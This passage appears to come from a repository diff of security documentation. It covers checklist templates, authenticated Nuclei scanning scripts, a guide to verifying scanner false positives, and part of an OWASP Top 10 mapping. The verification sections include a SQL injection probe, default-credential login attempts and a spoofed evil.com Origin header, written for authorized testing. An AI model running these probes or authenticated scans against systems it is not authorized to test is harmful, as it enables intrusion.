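Steps 5 and 6 (deduplicate and prioritize) can be as simple as keying findings on rule and location and ordering by severity rank; a minimal sketch with illustrative finding dictionaries:
```python
# Minimal sketch of the consolidation steps: deduplicate on (rule, location),
# then order by severity. The finding dictionaries are illustrative.
SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3, "info": 4}

findings = [
    {"rule": "CVE-2024-0001", "location": "https://app.example.com/login", "severity": "high"},
    {"rule": "CVE-2024-0001", "location": "https://app.example.com/login", "severity": "high"},  # duplicate
    {"rule": "hardcoded-secret", "location": "src/config.py:12", "severity": "critical"},
]

deduped = {(f["rule"], f["location"]): f for f in findings}.values()
prioritized = sorted(deduped, key=lambda f: SEVERITY_RANK.get(f["severity"], 99))

for f in prioritized:
    print(f'{f["severity"].upper():8} {f["rule"]} @ {f["location"]}')
```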
---
## Pattern 6: Research and Documentation Workflow
Use this pattern for security research and documentation tasks.
### Threat Modeling Workflow
Research Progress:
[ ] 1. Identify system components and boundaries
[ ] 2. Map data flows between components
[ ] 3. Identify trust boundaries
[ ] 4. Enumerate assets (data, services, credentials)
[ ] 5. Apply STRIDE framework to each component (see the sketch after this checklist):
- Spoofing threats
- Tampering threats
- Repudiation threats
- Information disclosure threats
- Denial of service threats
- Elevation of privilege threats
[ ] 6. Map threats to MITRE ATT&CK techniques
[ ] 7. Identify existing mitigations
[ ] 8. Document residual risks
[ ] 9. Recommend additional security controls
[ ] 10. Generate threat model document
Work through each step systematically. Check off completed items.
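A minimal sketch of step 5, seeding a threat register with one STRIDE entry per component; the component list and the placeholder fields are illustrative and would be filled in during the actual modeling session.
```python
# Minimal sketch of step 5: enumerate STRIDE categories for each component.
# Components and placeholder fields are illustrative for a real threat model.
STRIDE = [
    "Spoofing",
    "Tampering",
    "Repudiation",
    "Information disclosure",
    "Denial of service",
    "Elevation of privilege",
]

components = ["web frontend", "auth service", "payments API", "postgres database"]

threat_register = [
    {"component": component, "category": category, "threat": "TBD", "mitigation": "TBD"}
    for component in components
    for category in STRIDE
]

print(f"{len(threat_register)} threat candidates to review")  # 4 components x 6 categories = 24
```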
---
## Pattern 7: Compliance Validation Workflow
Use this pattern for compliance checks against security standards.
### Security Compliance Audit Workflow
**SOC 2 Controls Review**:
[ ] 1. Review access control policies (CC6.1, CC6.2, CC6.3)
[ ] 2. Verify logical access controls implementation (CC6.1)
[ ] 3. Review authentication mechanisms (CC6.1)
[ ] 4. Verify encryption implementation (CC6.1, CC6.7)
[ ] 5. Review audit logging configuration (CC7.2)
[ ] 6. Verify security monitoring (CC7.2, CC7.3)
[ ] 7. Review incident response procedures (CC7.3, CC7.4)
[ ] 8. Verify backup and recovery processes (A1.2, A1.3)
**Evidence Collection**:
[ ] 9. Collect policy documents
[ ] 10. Collect configuration screenshots
[ ] 11. Collect audit logs
[ ] 12. Document control gaps
[ ] 13. Generate compliance report
---
## Pattern 8: Incident Response Workflow
Use this pattern for security incident handling.
### Security Incident Response Workflow
**Detection and Analysis**:
[ ] 1. Confirm security incident (rule out false positive)
[ ] 2. Determine incident severity (SEV1/2/3/4)
[ ] 3. Identify affected systems and data
[ ] 4. Preserve evidence (logs, memory dumps, network captures)
**Containment**:
[ ] 5. Isolate affected systems (network segmentation)
[ ] 6. Disable compromised accounts
[ ] 7. Block malicious indicators (IPs, domains, hashes)
[ ] 8. Implement temporary compensating controls
**Eradication**:
[ ] 9. Identify root cause
[ ] 10. Remove malicious artifacts (malware, backdoors, webshells)
[ ] 11. Patch vulnerabilities exploited
[ ] 12. Reset compromised credentials
**Recovery**:
[ ] 13. Restore systems from clean backups (if needed)
[ ] 14. Re-enable systems with monitoring
[ ] 15. Verify system integrity
[ ] 16. Resume normal operations
**Post-Incident**:
[ ] 17. Document incident timeline
[ ] 18. Identify lessons learned
[ ] 19. Update security controls to prevent recurrence
[ ] 20. Update incident response procedures
[ ] 21. Communicate with stakeholders
---
## Usage Guidelines
### When to Use Workflow Checklists
**Use checklists for**:
- Complex multi-step operations
- Operations requiring specific order
- Security assessments and audits
- Incident response procedures
- Compliance validation tasks
**Don't use checklists for**:
- Simple single-step operations
- Highly dynamic exploratory work
- Operations that vary significantly each time
### Adapting This Template
1. **Copy relevant pattern** to your skill's SKILL.md or create new reference file
2. **Customize steps** to match your specific security tool or process
3. **Add framework references** (OWASP, CWE, NIST) where applicable
4. **Include tool-specific commands** for automation
5. **Add decision points** where manual judgment is required
### Checklist Best Practices
- **Be specific**: "Run semgrep --config=auto ." not "Scan the code"
- **Include success criteria**: "Validation passes with 0 errors"
- **Reference standards**: Link to OWASP, CWE, NIST where relevant
- **Show progress**: Checkbox format helps track completion
- **Provide escape hatches**: "If validation fails, see troubleshooting.md"
### Integration with Feedback Loops
Combine checklists with validation scripts for maximum effectiveness:
1. Create checklist for the workflow
2. Provide validation script that checks quality
3. Include "run validator" step in checklist
4. Loop: Complete step → Validate → Fix issues → Re-validate
This pattern dramatically improves output quality through systematic validation.

View File

@@ -0,0 +1,489 @@
# Nuclei Authentication Patterns
## Table of Contents
- [Bearer Token Authentication](#bearer-token-authentication)
- [Cookie-Based Authentication](#cookie-based-authentication)
- [API Key Authentication](#api-key-authentication)
- [OAuth 2.0 Authentication](#oauth-20-authentication)
- [Custom Authentication Scripts](#custom-authentication-scripts)
- [Multi-Factor Authentication](#multi-factor-authentication)
## Bearer Token Authentication
### Basic Bearer Token
```bash
# Using header flag
nuclei -u https://api.target.com \
-header "Authorization: Bearer $AUTH_TOKEN" \
-severity critical,high
# Using environment variable
export AUTH_TOKEN="your-token-here"
nuclei -u https://api.target.com \
-header "Authorization: Bearer $AUTH_TOKEN"
```
### JWT Token with Refresh
```bash
# Initial authentication to get token
TOKEN=$(curl -X POST https://api.target.com/auth/login \
-d '{"username":"test","password":"test"}' \
-H "Content-Type: application/json" | jq -r '.access_token')
# Scan with token
nuclei -u https://api.target.com \
-header "Authorization: Bearer $TOKEN" \
-tags api,cve
# Refresh token if needed
REFRESH_TOKEN=$(curl -X POST https://api.target.com/auth/refresh \
-H "Authorization: Bearer $TOKEN" | jq -r '.access_token')
```
## Cookie-Based Authentication
### Session Cookie Authentication
```bash
# Login and extract session cookie
curl -c cookies.txt -X POST https://target-app.com/login \
-d "username=testuser&password=testpass"
# Extract cookie value
SESSION=$(grep session cookies.txt | awk '{print $7}')
# Scan with session cookie
nuclei -u https://target-app.com \
-header "Cookie: session=$SESSION" \
-severity critical,high
```
### Multiple Cookies
```bash
# Multiple cookies can be specified
nuclei -u https://target-app.com \
-header "Cookie: session=$SESSION; user_id=$USER_ID; csrf_token=$CSRF" \
-tags cve,owasp
```
## API Key Authentication
### Header-Based API Key
```bash
# API key in header
nuclei -u https://api.target.com \
-header "X-API-Key: $API_KEY" \
-tags api,exposure
# Multiple API authentication headers
nuclei -u https://api.target.com \
-header "X-API-Key: $API_KEY" \
-header "X-Client-ID: $CLIENT_ID" \
-tags api
```
### Query Parameter API Key
Create custom template for query parameter auth:
```yaml
id: api-scan-with-query-auth
info:
name: API Scan with Query Parameter Auth
author: security-team
severity: info
http:
- method: GET
path:
- "{{BaseURL}}/api/endpoint?api_key={{api_key}}"
payloads:
api_key:
- "{{env('API_KEY')}}"
```
## OAuth 2.0 Authentication
### Client Credentials Flow
```bash
# Get access token
ACCESS_TOKEN=$(curl -X POST https://auth.target.com/oauth/token \
-d "grant_type=client_credentials" \
-d "client_id=$CLIENT_ID" \
-d "client_secret=$CLIENT_SECRET" \
-H "Content-Type: application/x-www-form-urlencoded" | jq -r '.access_token')
# Scan with OAuth token
nuclei -u https://api.target.com \
-header "Authorization: Bearer $ACCESS_TOKEN" \
-tags api,cve
```
### Authorization Code Flow
```bash
# Step 1: Manual authorization to get code
# Navigate to: https://auth.target.com/oauth/authorize?client_id=$CLIENT_ID&redirect_uri=$REDIRECT_URI&response_type=code
# Step 2: Exchange code for token
AUTH_CODE="received-from-redirect"
ACCESS_TOKEN=$(curl -X POST https://auth.target.com/oauth/token \
-d "grant_type=authorization_code" \
-d "code=$AUTH_CODE" \
-d "client_id=$CLIENT_ID" \
-d "client_secret=$CLIENT_SECRET" \
-d "redirect_uri=$REDIRECT_URI" | jq -r '.access_token')
# Step 3: Scan
nuclei -u https://api.target.com \
-header "Authorization: Bearer $ACCESS_TOKEN"
```
### OAuth Token Refresh
```bash
#!/bin/bash
# oauth_refresh_scan.sh
CLIENT_ID="your-client-id"
CLIENT_SECRET="your-client-secret"
REFRESH_TOKEN="your-refresh-token"
# Function to get fresh access token
get_access_token() {
curl -s -X POST https://auth.target.com/oauth/token \
-d "grant_type=refresh_token" \
-d "refresh_token=$REFRESH_TOKEN" \
-d "client_id=$CLIENT_ID" \
-d "client_secret=$CLIENT_SECRET" | jq -r '.access_token'
}
# Get token and scan
ACCESS_TOKEN=$(get_access_token)
nuclei -u https://api.target.com \
-header "Authorization: Bearer $ACCESS_TOKEN" \
-tags api,cve,owasp
```
## Custom Authentication Scripts
### Form-Based Login Script
```python
#!/usr/bin/env python3
import requests
import subprocess
import sys
def login_and_get_session():
"""Login and return session cookie"""
session = requests.Session()
# Perform login
login_data = {
"username": "testuser",
"password": "testpassword"
}
response = session.post(
"https://target-app.com/login",
data=login_data
)
if response.status_code != 200:
print(f"Login failed: {response.status_code}", file=sys.stderr)
sys.exit(1)
# Extract session cookie
session_cookie = session.cookies.get("session")
return session_cookie
def run_nuclei_scan(session_cookie, target_url):
"""Run Nuclei with authenticated session"""
cmd = [
"nuclei",
"-u", target_url,
"-header", f"Cookie: session={session_cookie}",
"-severity", "critical,high",
"-tags", "cve,owasp"
]
result = subprocess.run(cmd)
return result.returncode
if __name__ == "__main__":
target = sys.argv[1] if len(sys.argv) > 1 else "https://target-app.com"
print("Authenticating...")
session = login_and_get_session()
print("Running Nuclei scan...")
exit_code = run_nuclei_scan(session, target)
sys.exit(exit_code)
```
### SAML Authentication
```python
#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup
import subprocess
def saml_login(idp_url, username, password):
"""Perform SAML authentication flow"""
session = requests.Session()
# Step 1: Get SAML request from SP
sp_response = session.get("https://target-app.com/saml/login")
# Step 2: Submit credentials to IdP
soup = BeautifulSoup(sp_response.text, 'html.parser')
saml_request = soup.find('input', {'name': 'SAMLRequest'})['value']
idp_login = session.post(
idp_url,
data={
'username': username,
'password': password,
'SAMLRequest': saml_request
}
)
# Step 3: Submit SAML response back to SP
soup = BeautifulSoup(idp_login.text, 'html.parser')
saml_response = soup.find('input', {'name': 'SAMLResponse'})['value']
sp_acs = session.post(
"https://target-app.com/saml/acs",
data={'SAMLResponse': saml_response}
)
# Return session cookie
return session.cookies.get_dict()
# Use in Nuclei scan
cookies = saml_login(
"https://idp.example.com/saml/login",
"testuser",
"testpass"
)
cookie_header = "; ".join([f"{k}={v}" for k, v in cookies.items()])
subprocess.run([
"nuclei",
"-u", "https://target-app.com",
"-header", f"Cookie: {cookie_header}",
"-severity", "critical,high"
])
```
## Multi-Factor Authentication
### TOTP-Based MFA
```python
#!/usr/bin/env python3
import pyotp
import requests
import subprocess
def login_with_mfa(username, password, totp_secret):
"""Login with username, password, and TOTP"""
session = requests.Session()
# Step 1: Submit username and password
login_response = session.post(
"https://target-app.com/login",
data={
"username": username,
"password": password
}
)
# Step 2: Generate and submit TOTP code
totp = pyotp.TOTP(totp_secret)
mfa_code = totp.now()
mfa_response = session.post(
"https://target-app.com/mfa/verify",
data={"code": mfa_code}
)
if mfa_response.status_code != 200:
raise Exception("MFA verification failed")
return session.cookies.get("session")
# Use in scan
session_cookie = login_with_mfa(
"testuser",
"testpass",
"JBSWY3DPEHPK3PXP" # TOTP secret
)
subprocess.run([
"nuclei",
"-u", "https://target-app.com",
"-header", f"Cookie: session={session_cookie}",
"-tags", "cve,owasp"
])
```
### SMS/Email MFA (Manual Intervention)
```bash
#!/bin/bash
# mfa_manual_scan.sh
echo "Step 1: Performing initial login..."
curl -c cookies.txt -X POST https://target-app.com/login \
-d "username=testuser&password=testpass"
echo "Step 2: MFA code sent. Please check your email/SMS."
read -p "Enter MFA code: " MFA_CODE
echo "Step 3: Submitting MFA code..."
curl -b cookies.txt -c cookies.txt -X POST https://target-app.com/mfa/verify \
-d "code=$MFA_CODE"
echo "Step 4: Running Nuclei scan with authenticated session..."
SESSION=$(grep session cookies.txt | awk '{print $7}')
nuclei -u https://target-app.com \
-header "Cookie: session=$SESSION" \
-severity critical,high \
-tags cve,owasp
echo "Scan complete!"
```
## Advanced Patterns
### Dynamic Token Rotation
```bash
#!/bin/bash
# token_rotation_scan.sh
TARGET_URL="https://api.target.com"
AUTH_ENDPOINT="https://auth.target.com/token"
CLIENT_ID="client-id"
CLIENT_SECRET="client-secret"
# Function to get new token
refresh_token() {
curl -s -X POST $AUTH_ENDPOINT \
-d "grant_type=client_credentials" \
-d "client_id=$CLIENT_ID" \
-d "client_secret=$CLIENT_SECRET" | jq -r '.access_token'
}
# Get initial token
TOKEN=$(refresh_token)
# Scan critical templates
nuclei -u $TARGET_URL \
-header "Authorization: Bearer $TOKEN" \
-severity critical \
-tags cve
# Refresh token for next batch
TOKEN=$(refresh_token)
# Scan high severity templates
nuclei -u $TARGET_URL \
-header "Authorization: Bearer $TOKEN" \
-severity high \
-tags owasp
```
### Authenticated Multi-Target Scanning
```bash
#!/bin/bash
# multi_target_auth_scan.sh
# Read targets from file
TARGETS_FILE="targets.txt"
AUTH_TOKEN="your-auth-token"
while IFS= read -r target; do
echo "Scanning: $target"
nuclei -u "$target" \
-header "Authorization: Bearer $AUTH_TOKEN" \
-severity critical,high \
-o "results/$(echo $target | sed 's|https://||' | sed 's|/|_|g').txt"
sleep 5 # Rate limiting between targets
done < "$TARGETS_FILE"
echo "All scans complete!"
```
## Best Practices
1. **Never Hardcode Credentials**: Use environment variables or secrets management
2. **Rotate Tokens**: Refresh authentication tokens for long-running scans
3. **Session Validation**: Verify the session is still valid before scanning (see the sketch after this list)
4. **Rate Limiting**: Respect rate limits when authenticated (often higher quotas)
5. **Scope Validation**: Ensure the authenticated scan does not reach beyond the authorized scope
6. **Audit Logging**: Log all authenticated scan activities
7. **Token Expiry**: Handle token expiration gracefully with refresh
8. **Least Privilege**: Use accounts with minimum necessary privileges for testing
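For point 3 above, a minimal sketch that probes a known-authenticated endpoint before launching Nuclei; the `/api/me` endpoint and the `session` cookie name are assumptions and should be swapped for whatever your application exposes.
```python
#!/usr/bin/env python3
# Minimal sketch for best practice 3: confirm the session is still valid
# before starting a scan. The /api/me endpoint and cookie name are assumptions.
import subprocess
import sys
import requests

TARGET = "https://target-app.com"
SESSION_COOKIE = sys.argv[1] if len(sys.argv) > 1 else ""

resp = requests.get(f"{TARGET}/api/me", cookies={"session": SESSION_COOKIE}, timeout=10)
if resp.status_code != 200:
    print(f"Session invalid or expired (HTTP {resp.status_code}); re-authenticate first", file=sys.stderr)
    sys.exit(1)

subprocess.run([
    "nuclei",
    "-u", TARGET,
    "-header", f"Cookie: session={SESSION_COOKIE}",
    "-severity", "critical,high",
], check=False)
```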
## Troubleshooting
### Token Expired During Scan
```bash
# Add token refresh logic
nuclei -u https://api.target.com \
-header "Authorization: Bearer $TOKEN" \
-severity critical || {
echo "Scan failed, refreshing token..."
TOKEN=$(refresh_token)
nuclei -u https://api.target.com \
-header "Authorization: Bearer $TOKEN" \
-severity critical
}
```
### Session Cookie Not Working
```bash
# Debug session cookie
curl -v https://target-app.com/protected-page \
-H "Cookie: session=$SESSION"
# If the session cookie is a JWT, decode its payload segment to check expiration
echo $SESSION | cut -d '.' -f2 | base64 -d 2>/dev/null | jq '.exp'
# Re-authenticate if expired
SESSION=$(re_authenticate)
```
### Multiple Authentication Methods
```bash
# Some APIs require multiple auth headers
nuclei -u https://api.target.com \
-header "Authorization: Bearer $TOKEN" \
-header "X-API-Key: $API_KEY" \
-header "X-Client-ID: $CLIENT_ID" \
-tags api
```
## Resources
- [OAuth 2.0 RFC](https://oauth.net/2/)
- [JWT.io](https://jwt.io/)
- [SAML 2.0](http://saml.xml.org/)
- [Nuclei Authentication Docs](https://docs.projectdiscovery.io/)

View File

@@ -0,0 +1,491 @@
# Nuclei False Positive Handling Guide
## Table of Contents
- [Understanding False Positives](#understanding-false-positives)
- [Common False Positive Scenarios](#common-false-positive-scenarios)
- [Verification Techniques](#verification-techniques)
- [Template Filtering Strategies](#template-filtering-strategies)
- [Custom Template Refinement](#custom-template-refinement)
## Understanding False Positives
False positives occur when Nuclei reports a finding that doesn't represent an actual security vulnerability in the context of your application.
### Types of False Positives
1. **Context-Specific**: Finding is valid in general but not applicable to your application
2. **Version-Specific**: CVE template triggers but your version is patched
3. **Configuration-Based**: Security control exists but Nuclei can't detect it
4. **Pattern Matching Errors**: Regex/word matchers trigger on benign content
## Common False Positive Scenarios
### 1. Missing Security Headers (Info/Low Severity)
**Finding**: Missing `X-Frame-Options`, `Content-Security-Policy`
**False Positive When**:
- Headers set at CDN/WAF level (not visible to scanner)
- Application is not intended for browser rendering (pure API)
- Clickjacking exposure is mitigated by other controls (for example, `frame-ancestors` in a CSP served upstream)
**Verification**:
```bash
# Check headers from actual browser
curl -I https://target-app.com
curl -I https://target-app.com -H "User-Agent: Mozilla/5.0"
# Check if CDN adds headers
curl -I https://target-app.com -v 2>&1 | grep -i "x-frame-options\|content-security"
```
**Filter Strategy**:
```bash
# Exclude header-related info findings
nuclei -u https://target-app.com -etags headers -severity critical,high
```
### 2. Directory Listing / Exposed Paths
**Finding**: Directory listing enabled, exposed paths like `/admin`, `/backup`
**False Positive When**:
- Path requires authentication (Nuclei tested unauthenticated)
- Path is intentionally public (documentation, public assets)
- CDN/WAF blocks access (returns 200 with error page)
**Verification**:
```bash
# Manual verification with authentication
curl https://target-app.com/admin \
-H "Authorization: Bearer $TOKEN" \
-H "Cookie: session=$SESSION"
# Check actual response content
curl https://target-app.com/backup | head -20
```
**Filter Strategy**:
```bash
# Exclude exposure templates for authenticated scans
nuclei -u https://target-app.com \
-header "Authorization: Bearer $TOKEN" \
-etags exposure
```
### 3. CVE Templates Against Patched Versions
**Finding**: CVE-2024-XXXXX detected
**False Positive When**:
- Application version is patched but template matches on generic patterns
- Backported patches applied without version number change
- Template uses loose detection criteria
**Verification**:
```bash
# Check actual version
curl https://target-app.com/version
curl https://target-app.com -v 2>&1 | grep -i "server:"
# Cross-reference with CVE details
# Check if version is vulnerable per NVD/vendor advisory
```
**Filter Strategy**:
```bash
# Scan only recent CVEs
nuclei -u https://target-app.com \
-tags cve \
-template-condition "contains(id, 'CVE-2024') || contains(id, 'CVE-2023')"
# Exclude specific false positive templates
nuclei -u https://target-app.com \
-exclude-id CVE-2018-12345,CVE-2019-67890
```
### 4. Technology Detection False Positives
**Finding**: WordPress, Drupal, or other CMS detected
**False Positive When**:
- Generic strings match (like "wp-" in custom code)
- Legacy migration artifacts remain
- Application mimics CMS structure but isn't actually that CMS
**Verification**:
```bash
# Check for actual CMS files
curl https://target-app.com/wp-admin/
curl https://target-app.com/wp-includes/
curl https://target-app.com/readme.html
# Technology fingerprinting
whatweb https://target-app.com
wappalyzer https://target-app.com
```
**Filter Strategy**:
```bash
# Exclude tech detection templates
nuclei -u https://target-app.com -etags tech
```
### 5. Default Login Pages
**Finding**: Admin panel or login page detected
**False Positive When**:
- Panel is legitimate and intended to be accessible
- Panel requires MFA even if default credentials work
- Detection based on title/strings only without credential testing
**Verification**:
```bash
# Test if default credentials actually work
curl -X POST https://target-app.com/login \
-d "username=admin&password=admin" \
-v
# Check if MFA is required
curl -X POST https://target-app.com/login \
-d "username=admin&password=admin" \
-c cookies.txt
curl https://target-app.com/dashboard \
-b cookies.txt
```
**Filter Strategy**:
```bash
# Scan with authentication to skip login detection
nuclei -u https://target-app.com \
-header "Authorization: Bearer $TOKEN" \
-etags default-logins,exposed-panels
```
### 6. API Endpoints Reporting Errors
**Finding**: SQL errors, stack traces, or verbose errors detected
**False Positive When**:
- Errors are intentional validation messages
- Stack traces only shown in dev/staging (not production)
- API returns structured error JSON (not actual stack trace)
**Verification**:
```bash
# Check actual error response
curl "https://api.target.com/endpoint?id=invalid" -v
# Verify it's a validation error rather than a SQL error (payload URL-encoded so it survives the shell)
curl -G "https://api.target.com/endpoint" --data-urlencode "id=' OR '1'='1" -v
```
### 7. CORS Misconfiguration
**Finding**: `Access-Control-Allow-Origin: *`
**False Positive When**:
- Intentional for public APIs
- Only applies to non-sensitive endpoints
- Additional CORS headers restrict actual access
**Verification**:
```bash
# Check if sensitive endpoints have CORS
curl https://api.target.com/public/data \
-H "Origin: https://evil.com" -v
curl https://api.target.com/private/users \
-H "Origin: https://evil.com" \
-H "Authorization: Bearer $TOKEN" -v
```
## Verification Techniques
### Manual Verification Checklist
For each critical/high severity finding:
1. **Reproduce the finding**:
```bash
# Use exact URL and parameters from Nuclei output
curl "https://target-app.com/vulnerable-path" -v
```
2. **Check authentication context**:
```bash
# Test with authentication
curl "https://target-app.com/vulnerable-path" \
-H "Authorization: Bearer $TOKEN" -v
```
3. **Verify exploitability**:
- Can you actually exploit the vulnerability?
- Is there a working PoC?
- What's the actual impact?
4. **Check mitigating controls**:
- WAF rules blocking exploitation
- Network segmentation limiting access
- Monitoring and alerting in place
5. **Consult security team**:
- Discuss edge cases with security engineers
- Review against threat model
### Automated Verification Script
Use bundled script to batch verify findings:
```bash
python3 scripts/verify_findings.py \
--input nuclei-results.jsonl \
--auth-token $AUTH_TOKEN \
--output verified-findings.jsonl
```
## Template Filtering Strategies
### Strategy 1: Severity-Based Filtering
Focus on high-impact findings:
```bash
# Critical and high only
nuclei -u https://target-app.com -severity critical,high
# Exclude info findings
nuclei -u https://target-app.com -exclude-severity info
```
### Strategy 2: Tag-Based Filtering
Filter by vulnerability type:
```bash
# Only CVEs and OWASP vulnerabilities
nuclei -u https://target-app.com -tags cve,owasp
# Exclude informational tags
nuclei -u https://target-app.com -etags tech,info,headers
```
### Strategy 3: Template Exclusion
Exclude known false positive templates:
```bash
# Exclude specific templates
nuclei -u https://target-app.com \
-exclude-id CVE-2018-12345,generic-login-panel
# Exclude template directories
nuclei -u https://target-app.com \
-exclude-templates nuclei-templates/http/misconfiguration/
```
### Strategy 4: Custom Template Allowlist
Use only verified templates:
```bash
# Scan with curated template set
nuclei -u https://target-app.com \
-t custom-templates/verified/ \
-t nuclei-templates/http/cves/2024/
```
### Strategy 5: Conditional Template Execution
Use template conditions:
```bash
# Only recent critical CVEs
nuclei -u https://target-app.com \
-tags cve \
-severity critical \
-template-condition "contains(id, 'CVE-2024')"
```
## Custom Template Refinement
### Improving Matcher Accuracy
**Before (High False Positives)**:
```yaml
matchers:
- type: word
words:
- "admin"
```
**After (Lower False Positives)**:
```yaml
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "admin"
- "dashboard"
- "login"
condition: and
- type: regex
regex:
- '(?i)<title>[^<]*admin[^<]*panel[^<]*</title>' # (?i) keeps the match case-insensitive within the regex itself
```
### Adding Negative Matchers
Exclude known false positive patterns:
```yaml
matchers:
- type: word
words:
- "SQL syntax error"
# Negative matcher - must NOT match
- type: word
negative: true
words:
- "validation error"
- "input error"
```
### Version-Specific Matching
Match specific vulnerable versions:
```yaml
matchers-condition: and
matchers:
- type: regex
regex:
- 'WordPress/([0-5]\.[0-9]\.[0-9])' # Versions < 6.0.0
- type: word
words:
- "wp-admin"
```
### Confidence-Based Classification
Add confidence levels to findings:
```yaml
info:
metadata:
confidence: high # low, medium, high
matchers-condition: and # More matchers = higher confidence
matchers:
- type: status
status: [200]
- type: word
words: ["vulnerable_signature_1", "vulnerable_signature_2"]
condition: and
- type: regex
regex: ['specific[_-]pattern']
```
## False Positive Tracking
### Document Known False Positives
Create suppression file:
```yaml
# false-positives.yaml
suppressions:
- template: CVE-2018-12345
reason: "Application version is patched (backport applied)"
verified_by: security-team
verified_date: 2024-11-20
- template: exposed-admin-panel
urls:
- https://target-app.com/admin
reason: "Admin panel requires MFA and IP allowlist"
verified_by: security-team
verified_date: 2024-11-20
- template: missing-csp-header
reason: "CSP header added at CDN level (Cloudflare)"
verified_by: devops-team
verified_date: 2024-11-20
```
### Use Suppression in Scans
```bash
# Filter out documented false positives
python3 scripts/filter_suppressions.py \
--scan-results nuclei-results.jsonl \
--suppressions false-positives.yaml \
--output filtered-results.jsonl
```
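The filtering logic itself is simple enough to sketch in shell. The example below drops findings whose template ID appears in `false-positives.yaml`; it assumes nuclei's JSONL field `template-id` and only handles template-level suppressions, so URL-scoped entries still need the bundled script (whose interface may differ from this sketch).
```bash
# Minimal sketch: drop findings whose template id is listed in false-positives.yaml
# (template-level suppressions only; URL-scoped entries need a fuller parser)
SUPPRESSED_IDS=$(grep -E '^[[:space:]]*- template:' false-positives.yaml \
  | sed 's/.*template:[[:space:]]*//' | paste -sd, -)

jq -c --arg ids "$SUPPRESSED_IDS" \
  'select((."template-id") as $t | ($ids | split(",") | index($t)) | not)' \
  nuclei-results.jsonl > filtered-results.jsonl
```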
## Best Practices
1. **Always Verify Critical Findings Manually**: Don't trust automated tools blindly
2. **Context Matters**: What's vulnerable in one app may be safe in another
3. **Track False Positives**: Document and share with team
4. **Refine Templates**: Improve matcher accuracy over time
5. **Use Multiple Tools**: Cross-verify with other scanners (ZAP, Burp, etc.)
6. **Severity Calibration**: Adjust severity based on your environment
7. **Regular Template Updates**: Keep templates current to reduce false positives
8. **Authenticated Scanning**: Many false positives occur in unauthenticated scans
## Tools and Resources
### Verification Tools
```bash
# cURL for manual verification
curl -v https://target-app.com/endpoint
# httpie (user-friendly HTTP client)
http https://target-app.com/endpoint
# Burp Suite for manual testing
# ZAP for cross-verification
```
### Analysis Scripts
Use bundled scripts:
```bash
# Compare findings across scans
python3 scripts/compare_scans.py \
--baseline scan1.jsonl \
--current scan2.jsonl
# Filter findings by confidence
python3 scripts/filter_by_confidence.py \
--input scan-results.jsonl \
--min-confidence high \
--output high-confidence.jsonl
```
## Conclusion
False positives are inevitable in automated security scanning. The key is to:
- Understand WHY false positives occur
- Develop systematic verification processes
- Refine templates and filters over time
- Document and track false positives for future reference
- Balance automation with manual verification
A good rule of thumb: **Spend time refining your scanning approach to maximize signal-to-noise ratio**.

View File

@@ -0,0 +1,245 @@
# OWASP Top 10 2021 Mapping for Nuclei Findings
## Table of Contents
- [A01:2021 - Broken Access Control](#a012021---broken-access-control)
- [A02:2021 - Cryptographic Failures](#a022021---cryptographic-failures)
- [A03:2021 - Injection](#a032021---injection)
- [A04:2021 - Insecure Design](#a042021---insecure-design)
- [A05:2021 - Security Misconfiguration](#a052021---security-misconfiguration)
- [A06:2021 - Vulnerable and Outdated Components](#a062021---vulnerable-and-outdated-components)
- [A07:2021 - Identification and Authentication Failures](#a072021---identification-and-authentication-failures)
- [A08:2021 - Software and Data Integrity Failures](#a082021---software-and-data-integrity-failures)
- [A09:2021 - Security Logging and Monitoring Failures](#a092021---security-logging-and-monitoring-failures)
- [A10:2021 - Server-Side Request Forgery (SSRF)](#a102021---server-side-request-forgery-ssrf)
## A01:2021 - Broken Access Control
### Nuclei Template Tags
- `exposure` - Exposed sensitive files and directories
- `idor` - Insecure Direct Object References
- `auth-bypass` - Authentication bypass vulnerabilities
- `privilege-escalation` - Privilege escalation issues
### Common Findings
- **Exposed Admin Panels**: `/admin`, `/administrator`, `/wp-admin` accessible without authentication
- **Directory Listing**: Open directory listings exposing sensitive files
- **Backup Files Exposed**: `.bak`, `.sql`, `.zip` files publicly accessible
- **Git/SVN Exposure**: `.git`, `.svn` directories exposed
- **API Access Control**: Missing authorization checks on API endpoints
### Remediation Priority
**Critical** - Immediate action required for exposed admin panels and authentication bypasses
## A02:2021 - Cryptographic Failures
### Nuclei Template Tags
- `ssl` - SSL/TLS configuration issues
- `weak-crypto` - Weak cryptographic implementations
- `exposed-keys` - Exposed cryptographic keys
### Common Findings
- **Weak TLS Versions**: TLS 1.0, TLS 1.1 still enabled
- **Weak Cipher Suites**: RC4, DES, 3DES in use
- **Missing HSTS**: HTTP Strict Transport Security not configured
- **Self-Signed Certificates**: Invalid or self-signed SSL certificates
- **Exposed Private Keys**: Private keys in public repositories or directories
### Remediation Priority
**High** - Update to TLS 1.2+ and modern cipher suites
## A03:2021 - Injection
### Nuclei Template Tags
- `sqli` - SQL Injection
- `xss` - Cross-Site Scripting
- `xxe` - XML External Entity
- `ssti` - Server-Side Template Injection
- `nosqli` - NoSQL Injection
- `cmdi` - Command Injection
### Common Findings
- **SQL Injection**: User input reflected in database queries
- **Cross-Site Scripting (XSS)**: Reflected, Stored, and DOM-based XSS
- **Command Injection**: OS command execution via user input
- **LDAP Injection**: LDAP query manipulation
- **Template Injection**: Server-side template injection in Jinja2, Twig, etc.
### Remediation Priority
**Critical** - SQL Injection and Command Injection require immediate remediation
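For example, a focused scan for this category can be driven by the tags listed above; the target URL and output path are placeholders.
```bash
# Focused A03 scan using the injection-related tags listed above
nuclei -u https://target-app.com \
  -tags sqli,nosqli,xss,xxe,ssti,cmdi \
  -severity critical,high \
  -o a03-injection-findings.txt
```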
## A04:2021 - Insecure Design
### Nuclei Template Tags
- `logic` - Business logic flaws
- `workflow` - Workflow bypass vulnerabilities
### Common Findings
- **Rate Limiting Bypass**: Missing rate limiting on authentication endpoints
- **Workflow Bypass**: Steps in business processes can be skipped
- **Insufficient Resource Allocation**: No limits on resource consumption
- **Unvalidated Redirects**: Open redirect vulnerabilities
### Remediation Priority
**Medium to High** - Depends on business impact and exploitability
## A05:2021 - Security Misconfiguration
### Nuclei Template Tags
- `misconfig` - Generic misconfigurations
- `headers` - Missing security headers
- `cors` - CORS misconfigurations
- `debug` - Debug modes enabled in production
### Common Findings
- **Missing Security Headers**:
- `Content-Security-Policy`
- `X-Frame-Options`
- `X-Content-Type-Options`
- `Strict-Transport-Security`
